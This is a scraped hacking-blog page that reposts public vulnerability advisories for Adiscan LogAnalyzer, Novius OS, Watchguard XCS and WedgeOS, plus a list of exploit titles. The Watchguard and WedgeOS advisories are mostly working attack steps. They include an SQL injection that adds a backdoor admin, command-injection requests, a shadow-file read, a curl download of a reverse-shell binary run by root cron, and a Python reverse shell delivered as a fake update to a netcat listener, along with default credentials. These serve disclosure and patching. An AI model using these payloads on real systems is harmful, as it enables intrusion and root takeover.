source: https://www.securityfocus.com/bid/54117/info
Adiscan LogAnalyzer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
LogAnalyzer 3.4.3 is vulnerable; other versions may also be vulnerable.
http://www.example.com/?search=Search&highlight="<script>alert(document.cookie)</script>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863149324
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NOVIUSOS0629.txt
Vendor:
=======================
community.novius-os.org
Product:
===============================================================
novius-os.5.0.1-elche is a PHP Based Content Management System
community.novius-os.org/developpers/download.html
Advisory Information:
===================================
Persistent XSS, LFI & Open Redirect
Vulnerability Details:
======================
Persistent XSS:
---------------
Users can inject XSS payloads that will be saved to MySQL DB, where they
will execute each time when accessed.
1- In Admin under 'Media Center' users can inject XSS payloads and save to
the 'media_title' field for a saved media file,
create a new media page inject payload click save and then select
visualize.
2- Under Website menus area users can inject XSS payloads and save for the
'menu_title' field for a Website menu.
If we view browser source code at
http://localhost/novius-os.5.0.1-elche/novius-os/?_preview
the XSS is output to its HTML entities.
e.g.
<title><script>alert('HELL')</script></title>
But within the same webpage for <h1> tag you can see it is not.
e.g.
<div id="block-grid" class=" customisable col-md-12 col-sm-12 col-xs-12
main_wysiwyg"><h1 id="pagename"><script>alert('HELL')</script></h1>
Local File Inclusion:
---------------------
We can directory traverse access and read files outside of the current
working directory in the Admin area by abusing the 'tab' parameter.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../
Open Redirect:
--------------
http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=
is open to abuse by supplying an malicious a location or file.
XSS Exploit code(s):
====================
In 'Media Center' create a new media file, click edit and inject XSS
payload for the 'title' field click save and then select visualize.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_media/media/insert_update/1
vulnerable parameter:
media_title
In 'Website Menu' create a new website menu item and inject XSS payload
click save and then select visualize.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_menu/menu/crud/insert_update%3Fcontext%3Dmain%253A%253Aen_GB
http://localhost/novius-os.5.0.1-elche/novius-os/?_preview=1
vulnerable parameter:
menu_title
LFI:
----
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../SENSITIVE-FILE.txt
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../xampp/phpinfo.php
Open Redirect:
--------------
http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=http://www.SATANSBRONZEBABYSHOES.com
Disclosure Timeline:
======================================
Vendor Notification: NA
June 29, 2015 : Public Disclosure
Severity Level:
=================
Med
Description:
================================================================================
Request Method(s): [+] GET & POST
Vulnerable Product: [+] novius-os.5.0.1-elche
Vulnerable Parameter(s): [+] media_title, menu_title, tab, redirect
Affected Area(s): [+] Login, Web Pages, Media Center & Website
Menu area
=================================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that
it is not altered except by reformatting it, and that due credit is given.
Permission is
explicitly given for insertion in vulnerability databases and similar,
provided that
due credit is given to the author. The author is not responsible for any
misuse of the
information contained herein and prohibits any malicious use of all
security related
information or exploits by the author or elsewhere.
(hyp3rlinx)
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Watchguard XCS Multiple Vulnerabilities
Affected versions: Watchguard XCS <=10.0
PDF:
http://www.security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf
+-----------+
|Description|
+-----------+
The Watchguard XCS virtual appliance contains a number of
vulnerabilities, including unauthenticated SQL injection, command
execution and privilege escalation. By combining these vulnerabilities,
an attacker may remotely obtain root privileges on the underlying host.
+------------+
|Exploitation|
+------------+
==SQL Injection==
Unauthenticated SQL injection is possible through the “sid” cookie
parameter in the Watchguard XCS web interface due to a PHP script that
insecurely constructs an SQL query using that value. Stacked queries are
possible, and allow insertion of a backdoor web interface user into the
database. The following POC shows the insertion of a backdoor user, and
a python snippet that can be used to construct the Watchguard XCS
specific password hashes.
[SQLi POC]
GET /borderpost/imp/compose.php3 HTTP/1.1
Host: [HOST]
Cookie: sid=1%3BINSERT INTO sds_users (self, login, password, org,
priv_level, quota, disk_usage) VALUES(99, 'backdoor',
'0b75e2443d3c813d91ac5b91106a70ad', 0, 'server_admin', 0, 0)--
[Python Password Hash Generator]
import hashlib
def gen_hash(pass_clear):
PRE_SALT = "BorderWare "
POST_SALT = " some other random (9) stuff"
t1 = hashlib.md5(PRE_SALT + pass_clear + POST_SALT).hexdigest()
t2 = hashlib.md5(pass_clear + t1).hexdigest()
return t2
print gen_hash("backdoor")
==Command Injection==
The web interface of XCS contains a command injection vulnerability,
allowing an authenticated web application user to execute system
commands as the "nobody" user. The vulnerability is in the id parameter
of the "mailqueue.spl" page.
[POC]
GET /ADMIN/mailqueue.spl?f=dnld&id=;id;uname%20-a
Host: [HOST]
Cookie: [VALID COOKIE]
==Privilege Escalation==
Privilege Escalation
There are multiple methods to escalate privileges to root after
obtaining a shell. The "FixCorruptMail" script exploit is shown below,
an additional method is detailed in the accompanying PDF. Privilege
escalation is possible by exploiting the /usr/local/bin/FixCorruptMail
script when it is called by root's crontab every three minutes. This
script reads a file “badqids” from the /var/tmp directory, and
constructs a shell command using some of the contents.
[POC]
touch /tmp/dummyfile
/usr/local/sbin/curl -s http://[REVERSE_SHELL.elf] -o /tmp/revshell
chmod +x /tmp/revshell
echo "../../../../../../tmp/dummyfile;/tmp/revshell" > /var/tmp/badqids
The executable "/tmp/revshell" will be executed within three minutes by
the root user.
+----------+
| Solution |
+----------+
Apply the relevant XCS security hotfix (Build 150522) as provided by
Watchguard.
+-------------------+
|Disclosure Timeline|
+-------------------+
12/05/2015 - Email sent to confirm vendor security contact address is valid.
13/05/2015 - Response from vendor confirming address is valid.
13/05/2015 - Sent advisory through to vendor.
13/05/2015 - Vendor confirms receipt of advisory.
27/05/2015 - Vendor sends update on fixes, states a release will be
published shortly.
09/06/2015 - Security hotfixes released for Watchguard XCS v10.0 and v9.2.
29/06/2015 - Public advisory release.
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is Australasia's leading team of Information
Security consultants specialising in providing high quality Information
Security services to clients throughout the Asia Pacific region. Our
clients include some of the largest globally recognised companies in
areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and a
high level of technical expertise while creating long and lasting
professional relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info () security-assessment.com
Phone +64 4 470 1650
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
WedgeOS Multiple Vulnerabilities
Affected versions: WedgeOS <= 4.0.4
PDF:
http://www.security-assessment.com/files/documents/advisory/WedgeOS-Final.pdf
+-----------+
|Description|
+-----------+
Wedge Networks WedgeOS Virtual Appliance contains a number of security
vulnerabilities, including unauthenticated arbitrary file read as root,
command injection in the web interface, privilege escalation to root,
and command execution via the system update functionality.
+------------+
|Exploitation|
+------------+
==Unauthenticated Arbitrary File Read==
Any user with access to the web interface of WedgeOS may submit a GET
request to the ssgimages function, using directory traversal to specify
an arbitrary file on disk. The web server runs as root, so any file may
be read, including the shadow file. This vulnerability can be used to
read the contents of the local MySQL database, which contains MD5
password hashes for the web interface.
[POC]
curl -sk
'https://[HOST]/ssgmanager/ssgimages?name=../../../../../etc/shadow' |
head -n 1
root:$1$KVY2OJDj$Xg5LkGQI3lUvzr8GVIErp/:15828:0:99999:7:::
==Command Injection==
Any authenticated user may execute arbitrary commands as root. The ping,
nslookup, and traceroute functions of the diagnostic interface fail to
validate user input correctly, which allows the injection of arbitrary
system commands. Bash brace expansion can be used to execute more
syntactically complex commands.
[POC]
----
POST /ssgmanager/jsp/readaccess/ping.jsf HTTP/1.1
Host: [HOST]
Cookie: JSESSIONID=[SESSION];
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
mainform=mainform&mainform:input=1%26id&mainform:submitGo=Go&mainform:j_id_jsp_208968386_10pc4=&javax.faces.ViewState=j_id3
----
==Privilege Escalation==
A remote user with access to the 'support' account over SSH can escalate
privileges to root by using way of the admin account. The support
account can be accessed with the password "ous35hi3". This gives the
user a bash shell. If the support user knows the password for the admin
user, they can switch to the admin user and launch a bash shell.
Otherwise, the admin password can be reset by logging in with the
resetpassword user, or by accessing the local MySQL database and
cracking the admin hash. The database can be accessed with the "root"
user and password "wecandoit".
Once the user has the admin password, they can switch to the admin user
and spawn a bash shell by executing the following command:
su -s /bin/bash admin
With a bash shell as the admin user, there are multiple methods to
escalate to root. If the file at /var/tmp/secfi_update.sh does not
exist, this can be created and executed as root with sudo. However this
file is created when updating the system, so it may not be possible.
The admin user can also escalate privileges to root by creating a
specific directory path in any location where they have write access,
and exploiting environment variables when running the ctl_snort.sh
script via sudo.
[POC]
-Read admin password from DB-
ssh support@[HOST]
support@[HOST]'s password: [ous35hi3]
[support@wedgevm ~]$ mysql -u root --password=wecandoit ssgmanager -e
'select password from admin;'
+----------------------------------+
| password |
+----------------------------------+
| [PASSWORD] |
+----------------------------------+
-Reset admin password with support user-
ssh resetpassword@[HOST]
resetpassword@[HOST]'s password: [default!]
Reset password for admin (y/n)? y
Resetting admin password...
Admin password has been reset to default.
Connection to [HOST] closed.
-Privesc via environment variables and sudo-
[support@wedgevm ~]$ su -s /bin/bash admin
Password: [admin] (Default password)
[admin@wedgevm support]$ export GUARDIAN_HOME=/var/tmp
[admin@wedgevm support]$ mkdir -p /var/tmp/shared/script
[admin@wedgevm support]$ echo "id > /var/tmp/id" >
/var/tmp/shared/script/query_license.sh
[admin@wedgevm support]$ chmod +x /var/tmp/shared/script/query_license.sh
[admin@wedgevm support]$ sudo /usr/local/snort/bin/ctl_snort.sh start
-mode ids
Error: specify the snort configuration file with -config
[admin@wedgevm support]$ cat /var/tmp/id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[admin@wedgevm support]$
==Command Execution==
An admin user with write access to the web interface may execute
arbitrary commands as root. The user can specify an external server with
which to retrieve system updates. The WedgeOS requests a shell script
from the remote host and runs it as root. No validation of the script is
performed, so arbitrary commands may be specified.
[POC]
-Reverse Shell-
$cat secfi_update1.2.3.4.sh
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[HOST]",1337));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
-HTTP Post-
POST /ssgmanager/jsp/writeaccess/SystemUpdate.jsf HTTP/1.1
Host: [HOST]
Cookie: JSESSIONID=[SESSION]; JSESSIONIDSSO=[SESSION]
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
mainform=mainform&mainform%3Aid=1&mainform%3Apassword=1&mainform%3Aupdates=&mainform%3Aversion=1.2.3.4
&mainform%3AisDefaultServer=false&mainform%3AcustomServer=[HOST]%2F&mainform%3Asave=Run+Update&javax.faces.ViewState=j_id12
-HTTP Server and Listener-
$python -m SimpleHTTPServer 80 & netcat -vnlp 1337
[1] 24289
listening on [any] 1337 ...
Serving HTTP on 0.0.0.0 port 80 ...
[HOST] - - [18/Jun/2015 11:50:09] "GET /secfi_update1.2.3.4.sh HTTP/1.0"
200 -
connect to [HOST] from (UNKNOWN) [HOST] 53933
sh: no job control in this shell
sh-4.0# id
id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+----------+
| Solution |
+----------+
Update to WedgeOS version 4.0.5-482 or greater.
+-------------------+
|Disclosure Timeline|
+-------------------+
16/03/2015 - Advisory sent to vendor.
20/03/2015 - Follow up email checking if vendor has received.
24/03/2015 - Advisory receipt acknowledged by vendor.
22/04/2015 - Email sent asking for update, email undeliverable due to
421 Timeout from vendor mail server.
28/04/2015 - Additional email sent asking for update.
28/04/2015 - Vendor response, states official response will be provided
shortly.
15/05/2015 - Email sent asking for update on official response, email
undeliverable.
20/05/2015 - Additional email sent asking for update on official
response, email undeliverable.
27/05/2015 - Called vendor, who stated a new release is being worked on
and an update will be provided soon.
03/06/2015 - Email from vendor stating a new version is being put together.
09/06/2015 - Email sent to vendor stating the advisory will be publicly
disclosed soon, email undeliverable.
12/06/2015 - Called vendor, who stated a new version will be released
shortly.
12/06/2015 - Email from vendor confirming imminent release of new version.
12/06/2015 - Vendor advises a fix is in place in the newly released
update of WedgeOS.
29/06/2015 - Advisory Release.
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is Australasia's leading team of Information
Security consultants specialising in providing high quality Information
Security services to clients throughout the Asia Pacific region. Our
clients include some of the largest globally recognised companies in
areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and a
high level of technical expertise while creating long and lasting
professional relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info () security-assessment.com
Phone +64 4 470 1650
CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Cotonti - 'admin.php' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Fiyo CMS 2.0_1.9.1 - SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
Amazon S3 Uploadify Script - 'Uploadify.php' Arbitrary File Upload
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
WordPress Plugin Flip Book - 'PHP.php' Arbitrary File Upload
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
Umapresence - Local File Inclusion / Arbitrary File Deletion
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
DigPHP - 'dig.php' Script Remote File Disclosure
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
Joomla! Component com_szallasok - 'id' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
C2Box 4.0.0(r19171) - Cross-Site Request Forgery
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
McAfee SiteAdvisor 3.7.2 - Firefox Use-After-Free (PoC)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
FCKEditor Core - 'Editor 'spellchecker.php' Cross-Site Scripting
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Schoolhos CMS - HTML Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
WordPress Plugin Albo Pretorio Online 3.2 - Multiple Vulnerabilities
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view